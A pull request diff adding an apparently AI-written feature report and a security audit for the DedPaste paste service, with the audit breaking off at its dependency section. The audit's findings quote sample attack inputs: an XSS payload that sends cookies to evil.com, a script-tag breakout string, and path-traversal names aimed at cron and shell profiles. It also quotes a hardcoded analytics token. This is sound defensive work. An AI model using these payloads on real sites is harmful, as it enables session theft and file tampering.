### PR TITLE
feat: security hardening, service layer, API v1, and paste lifecycle

### DIFF
--- a/.agents/FEATURE-REPORT.md
+++ b/.agents/FEATURE-REPORT.md
@@ -1,0 +1,293 @@
+# Feature Development Report
+
+**Date**: 2026-02-22
+**Agent**: Feature Development Agent
+**Branch**: main (worktree agent-ae938025)
+
+---
+
+## Feature 1: Service Layer Architecture (P0 from TODOs 1.2)
+
+### Summary
+Created a proper service layer in `src/services/` that abstracts storage, paste CRUD, and encryption operations away from the monolithic `src/index.ts`. The service layer uses dependency injection via a `ServiceContainer` factory.
+
+### Files Created
+- `src/services/index.ts` - Service container, factory function `createServices()`, and central exports
+- `src/services/storageService.ts` - R2/KV storage abstraction with `IStorageService` interface
+- `src/services/pasteService.ts` - Paste CRUD business logic with `IPasteService` interface
+- `src/services/encryptionService.ts` - Server-side encryption utilities with `IEncryptionService` interface
+
+### Files Modified
+- `src/index.ts` - Added service layer initialization in the main fetch handler
+
+### Architecture Details
+
+**StorageService** (`IStorageService`):
+- `putPaste()` - Store paste content with metadata in R2
+- `getPaste()` / `getOneTimePaste()` - Retrieve pastes with automatic expiration checking
+- `deletePaste()` / `deleteOneTimePaste()` - Delete with verification for one-time pastes
+- `isOneTimePasteViewed()` / `markOneTimePasteViewed()` - One-time paste tracking
+- `putMetadata()` / `getMetadata()` / `deleteMetadata()` - KV metadata operations
+- `decrementReads()` - Burn-after-reading support
+- `setupBurnAfterReading()` - Initialize read tracking
+- `initialize()` - Load viewed-paste state from KV on startup
+
+**PasteService** (`IPasteService`):
+- `createPaste()` - Create pastes with full options (encryption, one-time, expiration, burn-after-reading)
+- `getPaste()` - Retrieve pastes with automatic one-time handling and burn-after-reading decrements
+- `deletePaste()` - Delete pastes
+- `parseDuration()` - Parse duration strings like "1h", "24h", "7d"
+
+**EncryptionService** (`IEncryptionService`):
+- `isEncryptedPayload()` - Detect DedPaste encrypted content
+- `validateEncryptedPayload()` - Validate encryption format (versions 1-4)
+- `generateToken()` - Cryptographic random tokens via Web Crypto API
+- `hash()` - SHA-256 hashing via Web Crypto API
+
+**ServiceContainer**:
+```typescript
+interface ServiceContainer {
+  storage: IStorageService;
+  paste: IPasteService;
+  encryption: IEncryptionService;
+}
+```
+
+Created via `createServices(env)` factory function with proper dependency injection.
+
+---
+
+## Feature 2: Paste Expiration & Burn-After-Reading Enhancement
+
+### Summary
+Enhanced paste lifecycle management with configurable expiration times and multi-read burn-after-reading. Pastes can now expire after a specified duration and can be configured to allow N reads before auto-deletion.
+
+### Files Modified
+- `src/index.ts` - Updated `handleUpload()`, `handleGet()`, and web upload handlers
+- `src/services/storageService.ts` - Added `expiresAt`, `remainingReads`, `maxReads` to `PasteMetadata`
+- `src/services/pasteService.ts` - Added `expireDuration` and `burnAfterReads` to `CreatePasteOptions`
+- `src/types/index.ts` - Added `burnCount`, `expire` to `PasteOptions`; added lifecycle types
+
+### How It Works
+
+**Expiration**:
+- CLI sends `X-Expire` header with duration (e.g., "1h", "24h", "7d")
+- API accepts `expireDuration` field in JSON body
+- Web upload form supports `expireDuration` field
+- Expiration timestamp stored in R2 custom metadata as `expiresAt`
+- On retrieval, expired pastes are automatically deleted and return 404
+- Response includes `X-Expires-At` header with ISO 8601 timestamp
+
+**Burn-After-Reading**:
+- CLI sends `X-Burn-Reads` header with count (e.g., "3" for 3 reads)
+- API accepts `burnAfterReads` field (positive integer, max 100)
+- Read count tracked in KV metadata (`reads:<id>`)
+- Each retrieval decrements the counter
+- When counter reaches 0, paste is deleted
+- Response includes `X-Remaining-Reads` header
+
+**Duration Format**:
+- `m` = minutes (e.g., "30m")
+- `h` = hours (e.g., "24h")
+- `d` = days (e.g., "7d")
+- `w` = weeks (e.g., "2w")
+- Presets: 5m, 15m, 30m, 1h, 6h, 12h, 24h, 48h, 7d, 14d, 30d
+
+### New Headers
+- Request: `X-Expire: <duration>` - Set expiration duration
+- Request: `X-Burn-Reads: <count>` - Set burn-after-reading count
+- Response: `X-Expires-At: <ISO 8601>` - When paste expires
+- Response: `X-Burn-Reads: <count>` - Burn reads set (on creation)
+- Response: `X-Remaining-Reads: <count>` - Reads remaining (on retrieval)
+
+---
+
+## Feature 3: Request Validation
+
+### Summary
+Created a comprehensive validation layer for all API endpoints with clear error messages and structured error responses. Implemented without a runtime dependency (lightweight TypeScript validation instead of Zod) for maximum compatibility with Cloudflare Workers.
+
+### Files Created
+- `src/validation/index.ts` - Central exports for all validation utilities
+- `src/validation/schemas.ts` - Validation schemas for all endpoints
+- `src/validation/middleware.ts` - Response helpers and validation middleware
+
+### Files Modified
+- `src/index.ts` - Updated `handleTextUpload()` and `handleWebUpload()` to use validation
+
+### Validation Schemas
+
+**TextUploadInput** (POST /api/text):
+- `content`: required string, non-empty, max 25MB
+- `oneTime`: optional boolean
+- `isEncrypted`: optional boolean
+- `expireDuration`: optional valid duration string
+- `burnAfterReads`: optional positive integer (1-100)
+
+**WebUploadInput** (POST /api/upload):
+- `file`: required File, non-empty, max 25MB
+- `oneTime`: boolean
+- `expireDuration`: optional valid duration
+- `burnAfterReads`: optional positive integer
+
+**MultipartInitInput** (POST /upload/init):
+- `filename`: required string
+- `contentType`: required string
+- `totalSize`: required positive number
+- `totalParts`: required positive integer
+- `isOneTime`: optional boolean
+- `isEncrypted`: optional boolean
+
+**ApiV1CreatePasteInput** (POST /api/v1/paste):
+- `content`: required string, non-empty, max 25MB
+- `contentType`: optional string (default "text/plain")
+- `filename`: optional string
+- `isOneTime`: optional boolean
+- `isEncrypted`: optional boolean
+- `expireDuration`: optional valid duration
+- `burnAfterReads`: optional positive integer (1-100)
+
+### Error Response Format
+```json
+{
+  "success": false,
+  "error": {
+    "code": "VALIDATION_ERROR",
+    "message": "content: Content cannot be empty",
+    "details": [
+      {
+        "field": "content",
+        "message": "Content cannot be empty",
+        "code": "too_small"
+      }
+    ]
+  }
+}
+```
+
+### Middleware Functions
+- `errorResponse()` - Create JSON error responses with CORS
+- `successResponse()` - Create JSON success responses with CORS
+- `checkValidation()` - Check validation result, return error Response or null
+- `parseJsonBody()` - Safely parse JSON request bodies
+- `validateMethod()` - Validate HTTP method
+- `notFoundResponse()` - 404 responses
+- `internalErrorResponse()` - 500 responses
+
+---
+
+## Feature 4: API Versioning & OpenAPI Foundation
+
+### Summary
+Added `/api/v1/` prefixed routes alongside existing routes with structured JSON API responses, proper HTTP status codes, and a health check endpoint. The API v1 layer uses the new service layer and validation.
+
+### Files Created
+- `src/api/v1/index.ts` - API v1 module export
+- `src/api/v1/router.ts` - API v1 route handler with full CRUD operations
+
+### Files Modified
+- `src/index.ts` - Integrated API v1 router into main fetch handler
+- `src/types/index.ts` - Added API v1 response types
+
+### API v1 Endpoints
+
+| Method | Path | Description |
+|--------|------|-------------|
+| GET | `/api/v1/health` | Health check with service status |
+| POST | `/api/v1/paste` | Create a new paste (JSON body) |
+| GET | `/api/v1/paste/:id` | Retrieve a paste by ID |
+| GET | `/api/v1/paste/e/:id` | Retrieve an encrypted paste by ID |
+| DELETE | `/api/v1/paste/:id` | Delete a paste by ID |
+| GET | `/api/v1/paste/:id/info` | Get paste metadata without consuming a read |
+
+### Response Format
+
+**Success Response**:
+```json
+{
+  "success": true,
+  "data": {
+    "id": "AbCdEfGh",
+    "url": "https://paste.d3d.dev/AbCdEfGh/paste.txt",
+    "isEncrypted": false,
+    "isBurnAfterReading": false,
+    "expiresAt": "2026-02-23T00:00:00.000Z"
+  }
+}
+```
+
+**Error Response**:
+```json
+{
+  "success": false,
+  "error": {
+    "code": "VALIDATION_ERROR",
+    "message": "content: Content is required and must be a string",
+    "details": [...]
+  }
+}
+```
+
+**Health Check Response**:
+```json
+{
+  "success": true,
+  "data": {
+    "status": "healthy",
+    "version": "v1",
+    "timestamp": "2026-02-22T12:00:00.000Z",
+    "services": {
+      "storage": "available",
+      "encryption": "available"
+    }
+  }
+}
+```
+
+### CORS Support
+All API v1 endpoints include:
+- `Access-Control-Allow-Origin: *`
+- `Access-Control-Allow-Methods: GET, POST, DELETE, OPTIONS`
+- `Access-Control-Allow-Headers: Content-Type, Authorization`
+- Proper OPTIONS preflight handling
+
+---
+
+## Files Changed Summary
+
+### New Files (10)
+- `src/services/index.ts` - Service container and factory
+- `src/services/storageService.ts` - R2/KV storage abstraction
+- `src/services/pasteService.ts` - Paste CRUD operations
+- `src/services/encryptionService.ts` - Encryption utilities
+- `src/validation/index.ts` - Validation module exports
+- `src/validation/schemas.ts` - Request validation schemas
+- `src/validation/middleware.ts` - Error/success response helpers
+- `src/api/v1/index.ts` - API v1 module exports
+- `src/api/v1/router.ts` - API v1 route handler
+- `.agents/FEATURE-REPORT.md` - This report
+
+### Modified Files (3)
+- `src/index.ts` - Service layer integration, API v1 routing, validation, expiration/burn support
+- `src/types/index.ts` - Added API v1 types, paste lifecycle types, new PasteOptions fields
+- `TODOs.md` - Updated completion status for implemented features
+
+---
+
+## Build Verification
+
+To build and verify:
+```bash
+npm install    # Install any new dependencies (none required - no Zod runtime)
+npm run build  # TypeScript compilation
+npm run lint   # ESLint check
+npm run format # Prettier formatting
+```
+
+**Note**: The validation layer was implemented using pure TypeScript validation instead of the Zod runtime library. This avoids adding a new dependency while providing the same validation capabilities. If Zod is desired in the future, the validation schemas can be easily migrated since they follow the same pattern (parse, validate, return typed result or errors).
+
+## Migration Notes
+- **No breaking changes** - All existing endpoints continue to work identically
+- New API v1 endpoints are additive and do not affect existing routes
+- Expiration and burn-after-reading features are opt-in via new headers/fields
+- The service layer is initialized alongside the existing code, not replacing it

--- a/.agents/SECURITY-AUDIT.md
+++ b/.agents/SECURITY-AUDIT.md
@@ -1,0 +1,521 @@
+# DedPaste Security Audit Report
+
+**Audit Date:** 2026-02-22
+**Auditor:** Code Security Agent (Claude Opus 4.6)
+**Scope:** Full codebase review -- Cloudflare Worker (`src/`), CLI (`cli/`), configuration, and dependencies
+**Version Audited:** 1.23.2 (commit 6b46c42)
+
+---
+
+## Executive Summary
+
+This audit identified **4 Critical**, **6 High**, **8 Medium**, and **6 Low** severity findings across the DedPaste codebase. The most urgent issues relate to insecure random number generation for paste IDs, missing security headers on the worker, unsanitized markdown rendering that enables stored XSS, and path traversal vulnerabilities in the key management system. The encryption implementation is generally sound (AES-256-GCM with RSA-OAEP, OpenPGP via openpgp.js), though the RSA key size of 2048 bits falls below modern recommendations.
+
+---
+
+## Critical Findings
+
+### C1. Insecure Random Number Generation for Paste IDs
+
+**Severity**: Critical
+**Location**: `src/index.ts:83-91`
+**Finding**: The `generateId()` function uses `Math.random()` to generate paste IDs, which is cryptographically insecure. `Math.random()` uses a PRNG that is not suitable for security-sensitive contexts. On Cloudflare Workers, the `crypto.getRandomValues()` API is available and should be used instead.
+**Risk**: An attacker could predict paste IDs and access pastes (including one-time pastes) before the intended recipient. This is especially dangerous for encrypted and one-time pastes where the URL is the primary access control mechanism.
+**Recommendation**: Replace `Math.random()` with `crypto.getRandomValues()`:
+```typescript
+function generateId(length = 8): string {
+  const chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
+  const randomValues = new Uint32Array(length);
+  crypto.getRandomValues(randomValues);
+  let result = "";
+  for (let i = 0; i < length; i++) {
+    result += chars.charAt(randomValues[i] % chars.length);
+  }
+  return result;
+}
+```
+Also increase the default ID length from 8 to at least 16 characters to increase the entropy space.
+**References**: CWE-330 (Use of Insufficiently Random Values), OWASP Cryptographic Failures
+
+---
+
+### C2. Stored XSS via Markdown Rendering
+
+**Severity**: Critical
+**Location**: `src/index.ts:1220-1227`, `src/index.ts:1794`
+**Finding**: Markdown content uploaded by users is rendered to HTML using `marked.parse()` without any HTML sanitization. While the custom code block renderer uses `escapeHtml()`, the `marked` library itself does NOT sanitize inline HTML within markdown. A paste containing `<script>alert('XSS')</script>` or `<img onerror="fetch('https://evil.com?c='+document.cookie)">` embedded in markdown would execute in any visitor's browser.
+
+The rendered HTML is inserted directly into the page:
+```typescript
+<div class="markdown-content">
+  ${htmlContent}   // <-- unsanitized marked output
+</div>
+```
+
+Additionally, the original markdown is embedded as a JSON string on line 1808:
+```typescript
+const originalMarkdown = ${JSON.stringify(markdownContent)};
+```
+While `JSON.stringify` escapes quotes and special characters, this pattern should still be reviewed carefully.
+
+**Risk**: Any user can upload a markdown paste that executes arbitrary JavaScript in another user's browser. This enables session hijacking, credential theft, defacement, and phishing.
+**Recommendation**:
+1. Use a sanitization library like `dompurify` (via `isomorphic-dompurify` for Workers) or `sanitize-html` after `marked.parse()`.
+2. Add a Content-Security-Policy header that blocks inline scripts (see H1 below).
+3. Consider rendering markdown client-side instead of server-side to reduce the attack surface.
+**References**: CWE-79 (Cross-site Scripting), OWASP A03:2021 Injection
+
+---
+
+### C3. No Authentication or Authorization on API Endpoints
+
+**Severity**: Critical
+**Location**: `src/index.ts:120-288` (entire request handler)
+**Finding**: All API endpoints (upload, multipart upload, get, delete) are completely unauthenticated. Any anonymous user can:
+- Upload unlimited content to R2 storage
+- Initiate multipart uploads up to 5GB
+- Access any paste by guessing/brute-forcing 8-character IDs
+- Abuse the service for malware distribution, data exfiltration, or illegal content hosting
+
+**Risk**: The service is open to abuse at massive scale. Storage costs could be driven up maliciously. The service could be used to host malicious content, with the domain operator bearing legal liability.
+**Recommendation**:
+1. Implement API key or token-based authentication at minimum for uploads.
+2. Add rate limiting per IP/fingerprint (Cloudflare Workers supports `request.cf.clientTrustScore` and rate limiting rules).
+3. Add upload size limits for non-multipart uploads (currently only multipart has a 5GB cap; regular uploads have no size limit).
+4. Consider requiring CAPTCHA or proof-of-work for anonymous uploads.
+**References**: CWE-306 (Missing Authentication for Critical Function), OWASP A07:2021 Identification and Authentication Failures
+
+---
+
+### C4. Hardcoded Mixpanel Analytics Token in Source Code
+
+**Severity**: Critical
+**Location**: `src/analytics.ts:27`, `src/analytics.ts:232`, `cli/analytics.ts:41`
+**Finding**: The Mixpanel project token `9c4a09e9631e9675165a65a03c54dc6e` is hardcoded in multiple source files and shipped in the published npm package. While Mixpanel project tokens are considered "public" by Mixpanel's design (unlike API secrets), having a hardcoded token:
+- Allows anyone to send fake analytics events to pollute the project data
+- Exposes the analytics infrastructure to abuse
+- The token is present in both the worker and CLI code, meaning it is distributed to every user who installs the npm package
+
+**Risk**: Analytics data integrity is compromised. An attacker can inject false tracking events, manipulate metrics, or perform analytics denial-of-service.
+**Recommendation**:
+1. Move the token to environment variables/secrets (`wrangler secret put MIXPANEL_TOKEN`).
+2. For the CLI, use `process.env.DEDPASTE_MIXPANEL_TOKEN` with an opt-in model.
+3. Consider whether analytics is appropriate in a security-focused tool and make it opt-in with clear disclosure.
+**References**: CWE-798 (Use of Hard-coded Credentials)
+
+---
+
+## High Findings
+
+### H1. Missing Security Headers
+
+**Severity**: High
+**Location**: `src/index.ts` (all response handlers)
+**Finding**: The worker does not set any security headers on responses:
+- No `Content-Security-Policy` header (enables XSS, clickjacking, data injection)
+- No `X-Content-Type-Options: nosniff` (enables MIME-type sniffing attacks)
+- No `X-Frame-Options: DENY` (enables clickjacking)
+- No `Strict-Transport-Security` header (allows HTTPS downgrade)
+- No `Referrer-Policy` header (leaks paste URLs in referrer headers)
+- No `Permissions-Policy` header
+
+**Risk**: Multiple attack vectors remain open: XSS amplification, clickjacking of paste content, MIME confusion attacks, and information leakage via Referrer headers.
+**Recommendation**: Add a middleware or wrapper that sets security headers on all responses:
+```typescript
+const securityHeaders = {
+  "Content-Security-Policy": "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com; font-src https://fonts.gstatic.com; img-src 'self' data:;",
+  "X-Content-Type-Options": "nosniff",
+  "X-Frame-Options": "DENY",
+  "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
+  "Referrer-Policy": "no-referrer",
+  "Permissions-Policy": "camera=(), microphone=(), geolocation=()"
+};
+```
+**References**: OWASP A05:2021 Security Misconfiguration
+
+---
+
+### H2. Overly Permissive CORS Policy
+
+**Severity**: High
+**Location**: `src/index.ts:153-158`, `src/index.ts:279`, `src/index.ts:676-679` (and 20+ more locations)
+**Finding**: Every response includes `"Access-Control-Allow-Origin": "*"`, allowing any website to make cross-origin requests to the DedPaste API. This means any malicious website can:
+- Upload pastes on behalf of visitors
+- Read paste content cross-origin
+- Enumerate paste IDs
+
+**Risk**: Cross-origin attacks can leverage the DedPaste API for data exfiltration, CSRF-like attacks, and abuse.
+**Recommendation**: Restrict CORS to the specific origins that need access (e.g., the DedPaste web UI domain). For the CLI, CORS is not needed. Consider a whitelist approach:
+```typescript
+const allowedOrigins = ["https://paste.d3d.dev"];
+```
+**References**: CWE-942 (Permissive Cross-domain Policy), OWASP A05:2021
+
+---
+
+### H3. Content-Disposition Header Injection
+
+**Severity**: High
+**Location**: `src/index.ts:955`, `src/index.ts:1044`
+**Finding**: The filename from user-supplied metadata or URL path is inserted directly into the `Content-Disposition` header without proper sanitization:
+```typescript
+"Content-Disposition": `${disposition}; filename="${effectiveFilename}"`
+```
+Where `effectiveFilename` can come from `urlFilename` (extracted from URL path) or `filename` (from stored metadata, originally from `X-Filename` header). A specially crafted filename containing `"` characters could break out of the quoted value and inject additional header directives.
+
+**Risk**: Header injection can lead to response splitting, cache poisoning, or misleading the user about the downloaded file type.
+**Recommendation**: Sanitize filenames by removing or escaping special characters:
+```typescript
+const safeFilename = effectiveFilename.replace(/["\\\r\n]/g, '_');
+```
+Use RFC 6266 compliant encoding: `filename*=UTF-8''${encodeURIComponent(filename)}`
+**References**: CWE-113 (HTTP Response Splitting)
+
+---
+
+### H4. Path Traversal in Key Storage Functions
+
+**Severity**: High
+**Location**: `cli/keyManager.ts:149`, `cli/keyManager.ts:320`, `cli/keyManager.ts:357`, `cli/keyManager.ts:402`
+**Finding**: The `addFriendKey`, `addPgpKey`, `addKeybaseKey`, and `addGitHubKey` functions construct file paths using unsanitized user-provided names:
+```typescript
+const keyPath = path.join(FRIENDS_KEY_DIR, `${name}.pem`);
+await fsPromises.writeFile(keyPath, keyContent);
+```
+If `name` contains path traversal characters (e.g., `../../.bashrc`, `../../../etc/cron.d/evil`), an attacker who can influence the key name could write files to arbitrary locations on the filesystem.
+
+**Risk**: Arbitrary file write on the system running the CLI. Could lead to code execution via cron, shell profiles, or other auto-executed files.
+**Recommendation**: Validate and sanitize the key name to only allow alphanumeric characters, hyphens, dots, and underscores:
+```typescript
+function sanitizeKeyName(name: string): string {
+  return name.replace(/[^a-zA-Z0-9._@-]/g, '_');
+}
+```
+Also verify the resolved path stays within the intended directory:
+```typescript
+const resolvedPath = path.resolve(keyPath);
+if (!resolvedPath.startsWith(path.resolve(FRIENDS_KEY_DIR))) {
+  throw new Error('Invalid key name: path traversal detected');
+}
+```
+**References**: CWE-22 (Path Traversal)
+
+---
+
+### H5. No Upload Size Limit for Standard (Non-Multipart) Uploads
+
+**Severity**: High
+**Location**: `src/index.ts:586-681` (`handleUpload`), `src/index.ts:2099-2148` (`handleWebUpload`), `src/index.ts:2153-2203` (`handleTextUpload`)
+**Finding**: While multipart uploads have a 5GB maximum (`LARGE_FILE_CONSTANTS.MAX_FILE_SIZE`), the standard upload handlers (`/upload`, `/temp`, `/api/upload`, `/api/text`) have no content size validation beyond checking for empty content. An attacker can upload arbitrarily large files in a single request.
+
+**Risk**: Storage exhaustion, increased R2 costs, denial-of-service.
+**Recommendation**: Add explicit size limits:
+```typescript
+const MAX_STANDARD_UPLOAD_SIZE = 25 * 1024 * 1024; // 25MB
+if (content.byteLength > MAX_STANDARD_UPLOAD_SIZE) {
+  return new Response("Content too large. Maximum size is 25MB for standard uploads.", { status: 413 });
+}
+```
+**References**: CWE-770 (Allocation of Resources Without Limits)
+
+---
+
+### H6. RSA-2048 Key Size Below Modern Recommendations
+
+**Severity**: High
+**Location**: `cli/keyManager.ts:114`
+**Finding**: The key generation function creates RSA-2048 keys:
+```typescript
+const { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {
+  modulusLength: 2048,
+  ...
+});
+```
+NIST recommends RSA-3072 or higher for security beyond 2030. RSA-2048 provides approximately 112 bits of security, while RSA-3072 provides 128 bits.
+
+**Risk**: Keys generated today with RSA-2048 may be vulnerable to advances in factoring algorithms or quantum computing sooner than expected.
+**Recommendation**: Increase the default key size to 4096 bits, or better yet, offer Ed25519/Curve25519 key generation as the default (faster and more secure).
+**References**: NIST SP 800-57 Part 1, CWE-326 (Inadequate Encryption Strength)
+
+---
+
+## Medium Findings
+
+### M1. In-Memory Viewed Pastes Tracker is Not Distributed
+
+**Severity**: Medium
+**Location**: `src/index.ts:104` (`viewedPastes` global variable)
+**Finding**: The one-time paste viewing tracker uses an in-memory JavaScript object that is local to a single Cloudflare Worker instance. In a distributed deployment (which Cloudflare Workers inherently is), different edge locations or isolates will have different copies of this tracker. While KV is used as a backup, KV has eventual consistency (not strong consistency), meaning there is a race window where a one-time paste can be viewed multiple times from different edge locations.
+
+**Risk**: One-time pastes may be viewable more than once, defeating their security guarantee.
+**Recommendation**:
+1. Use Cloudflare Durable Objects for strongly consistent one-time paste tracking.
+2. Alternatively, use KV with a "check-and-delete" atomic operation pattern where the paste is deleted from R2 first and the content served from the response buffer.
+**References**: CWE-367 (Time-of-check Time-of-use Race Condition)
+
+---
+
+### M2. No Rate Limiting on Any Endpoint
+
+**Severity**: Medium
+**Location**: `src/index.ts` (entire worker)
+**Finding**: There is a `RateLimitError` class defined in `src/types/index.ts:207-210`, but it is never used anywhere in the codebase. No rate limiting is implemented on any endpoint. This means:
+- Unlimited paste creation rate
+- Unlimited paste retrieval (enables brute-force ID enumeration)
+- Unlimited multipart upload session creation
+
+**Risk**: Denial-of-service, storage cost abuse, brute-force attacks on paste IDs.
+**Recommendation**: Implement rate limiting using Cloudflare's built-in rate limiting features or a KV-based token bucket algorithm.
+**References**: CWE-799 (Improper Control of Interaction Frequency), OWASP A04:2021
+
+---
+
+### M3. Private Keys Stored Without Encryption at Rest
+
+**Severity**: Medium
+**Location**: `cli/keyManager.ts:127-128`
+**Finding**: RSA private keys are written to disk in plaintext PEM format:
+```typescript
+await fsPromises.writeFile(privateKeyPath, privateKey);
+```
+No passphrase protection or file encryption is applied. The key database (`keydb.json`) is also stored in plaintext.
+
+**Risk**: If the user's filesystem is compromised (malware, stolen device, shared hosting), all private keys are immediately exposed.
+**Recommendation**:
+1. Encrypt private keys at rest using a user-provided passphrase (PKCS#8 encrypted PEM format).
+2. Set restrictive file permissions (0600) on private key files.
+3. Consider using OS keychain integration (macOS Keychain, Linux secret-service, Windows Credential Manager).
+**References**: CWE-312 (Cleartext Storage of Sensitive Information)
+
+---
+
+### M4. `keybase-api` Package is Version 0.0.1 (Abandoned/Unmaintained)
+
+**Severity**: Medium
+**Location**: `package.json:72`
+**Finding**: The `keybase-api` package is at version `0.0.1`, indicating it is either extremely early-stage or abandoned. Keybase itself was acquired by Zoom in 2020 and its active development has largely ceased. Using an unmaintained dependency at version 0.0.1 poses supply chain risks.
+
+**Risk**: The dependency could contain unpatched vulnerabilities, could be taken over via npm name squatting, or could stop functioning without notice.
+**Recommendation**:
+1. Evaluate if the Keybase integration is still needed given Keybase's declining usage.
+2. If needed, vendor the minimal required code or use the Keybase API directly via `fetch`.
+3. At minimum, pin the exact version in `package-lock.json` and audit the package source.
+**References**: CWE-1104 (Use of Unmaintained Third-Party Components)
+
+---
+
+### M5. Fallback Key ID Generation Uses `Math.random()`
+
+**Severity**: Medium
+**Location**: `cli/pgpUtils.ts:399`
+**Finding**: When PGP key ID extraction fails, a fallback ID is generated using `Math.random()`:
+```typescript
+keyId = Math.random().toString(16).substring(2, 10).toUpperCase();
+```
+This creates non-unique, predictable key identifiers that could collide with real key IDs.
+
+**Risk**: Key ID collisions could lead to the wrong encryption key being used, or key confusion attacks.
+**Recommendation**: Use `crypto.randomBytes(8).toString('hex').toUpperCase()` for cryptographically random fallback IDs, or throw an error instead of generating fake IDs.
+**References**: CWE-330 (Use of Insufficiently Random Values)
+
+---
+
+### M6. Potential JSON Injection via `marked` Configuration
+
+**Severity**: Medium
+**Location**: `src/index.ts:1808`
+**Finding**: The original markdown content is embedded in the rendered HTML page as a JavaScript variable:
+```typescript
+const originalMarkdown = ${JSON.stringify(markdownContent)};
+```
+While `JSON.stringify` provides escaping, certain edge cases with `</script>` strings inside the markdown content could break out of the script context. For example, if the markdown contains the literal string `</script><script>alert(1)</script>`, `JSON.stringify` would produce `"</script><script>alert(1)</script>"`, and the browser's HTML parser would see the first `</script>` as closing the script tag.
+
+**Risk**: XSS via script tag injection in markdown content.
+**Recommendation**: Replace `</` with `<\/` in the JSON output:
+```typescript
+const originalMarkdown = ${JSON.stringify(markdownContent).replace(/</g, '\\u003c')};
+```
+**References**: CWE-79 (Cross-site Scripting)
+
+---
+
+### M7. Test Mode Bypass in PGP Decryption
+
+**Severity**: Medium
+**Location**: `cli/encryptionUtils.ts:343`, `cli/pgpUtils.ts:792-794`
+**Finding**: A `TEST_MODE` passphrase bypass exists in the PGP decryption code:
+```typescript
+if (passphrase === 'TEST_MODE') {
+  console.log('TEST MODE: Skipping actual PGP decryption');
+  return Buffer.from('TEST MODE DECRYPTION - This would normally show decrypted content');
+}
+```
+This test code should not be in production builds.
+
+**Risk**: If an attacker can influence the passphrase parameter, they can bypass decryption entirely (though they would not get the actual plaintext).
+**Recommendation**: Remove test mode from production code entirely, or gate it behind an environment variable (`NODE_ENV === 'test'`).
+**References**: CWE-489 (Active Debug Code)
+
+---
+
+### M8. KV Namespace IDs Exposed in `wrangler.toml`
+
+**Severity**: Medium
+**Location**: `wrangler.toml:20-28`
+**Finding**: The KV namespace IDs are committed to the repository:
+```toml
+id = "0d25f4b9e61a44ab92634e7941cea0a0"
+preview_id = "0d25f4b9e61a44ab92634e7941cea0a0"
+...
+id = "c0251d912bb045df9c363b1b00be81a1"
+```
+While these IDs alone don't grant access (they require Cloudflare account authentication), they unnecessarily expose infrastructure details.
+
+**Risk**: Information disclosure that aids targeted attacks against the Cloudflare account.
+**Recommendation**: Use environment-specific `wrangler.toml` files or environment variables for namespace IDs. Reference them via `wrangler.toml` variable substitution if supported, or use `.dev.vars`.
+**References**: CWE-200 (Exposure of Sensitive Information)
+
+---
+
+## Low Findings
+
+### L1. `console.log` and `console.error` Statements May Leak Sensitive Data
+
+**Severity**: Low
+**Location**: Multiple locations across `src/index.ts`, `cli/pgpUtils.ts`, `cli/encryptionUtils.ts`
+**Finding**: Extensive console logging includes paste IDs, storage keys, content types, encryption status, and operation details. In the worker context, these logs are visible in Cloudflare's logging dashboard.
+
+Example: `src/index.ts:628`: `console.log(\`Created one-time paste with storage key ${storageKey}, isEncrypted=${isEncrypted}\`);`
+
+**Risk**: Log aggregation systems could expose paste metadata to operators or through log exfiltration.
+**Recommendation**: Use structured logging with log levels, and ensure sensitive identifiers are not logged in production. Reduce verbose logging behind a debug flag.
+**References**: CWE-532 (Insertion of Sensitive Information into Log File)
+
+---
+
+### L2. Missing `noopener noreferrer` on External Links
+
+**Severity**: Low
+**Location**: `src/index.ts:313`, and throughout `src/muiStyles.ts`
+**Finding**: External links in the generated HTML pages use `target="_blank"` without `rel="noopener noreferrer"`:
+```html
+<a href="https://github.com/anoncam/dedpaste" target="_blank" class="btn-secondary">
+```
+**Risk**: The linked page could access `window.opener` and potentially redirect the DedPaste tab (reverse tabnabbing).
+**Recommendation**: Add `rel="noopener noreferrer"` to all `target="_blank"` links.
+**References**: CWE-1022 (Use of Web Link to Untrusted Target with window.opener Access)
+
+---
+
+### L3. Dependencies Include Dev-Only Tools in `dependencies` (Not `devDependencies`)
+
+**Severity**: Low
+**Location**: `package.json:61-79`
+**Finding**: Several packages that appear to be development-only tools are listed under `dependencies` rather than `devDependencies`:
+- `eslint` (v9.34.0) -- linter, not needed at runtime
+- `prettier` (v3.6.2) -- formatter, not needed at runtime
+- `@types/highlight.js`, `@types/marked` -- TypeScript type definitions, not needed at runtime
+- `@emotion/react`, `@emotion/styled`, `@emotion/server`, `@mui/material` -- UI framework packages that are bundled into the worker at build time and should not be runtime npm dependencies
+
+**Risk**: Increased attack surface from unnecessary runtime dependencies. Users who install `dedpaste` globally will download and install all these packages unnecessarily.
+**Recommendation**: Move dev-only packages to `devDependencies`. For packages bundled into the worker, they should also be in `devDependencies`.
+**References**: CWE-1104 (Use of Unmaintained Third-Party Components)
+
+---
+
+### L4. `engines` Field Specifies Node.js >= 14
+
+**Severity**: Low
+**Location**: `package.json:46`
+**Finding**: The `engines` field allows Node.js 14, which has been end-of-life since April 2023. Running on EOL Node.js versions means missing security patches.
+
+**Risk**: Users on outdated Node.js could be exposed to known Node.js vulnerabilities.
+**Recommendation**: Update to `"node": ">=18"` at minimum (Node.js 18 is in maintenance LTS until April 2025; Node.js 20 is the current active LTS).
+**References**: CWE-1104 (Use of Unmaintained Third-Party Components)
+
+---
+
+### L5. `postinstall` Script Runs `chmod` Without Error Handling
+
+**Severity**: Low
+**Location**: `package.json:14`
+**Finding**: The `postinstall` script runs `chmod +x ./cli/index.js`. This will fail silently on Windows systems and has no error handling.
+
+**Risk**: Minor -- no security impact, but could mask installation issues.
+**Recommendation**: Add platform detection or use a cross-platform alternative.
+**References**: Informational
+
+---
+
+### L6. Compatibility Date in `wrangler.toml` is Outdated
+
+**Severity**: Low
+**Location**: `wrangler.toml:3`
+**Finding**: `compatibility_date = "2023-10-02"` is over 2 years old. Cloudflare Workers compatibility dates control which runtime behaviors are active. Older dates may miss security improvements and bug fixes in the Workers runtime.
+
+**Risk**: Missing runtime-level security improvements from Cloudflare.
+**Recommendation**: Update to a recent compatibility date (e.g., `2025-01-01` or later).
+**References**: Informational
+
+---
+
+## Dependency Audit Results
+
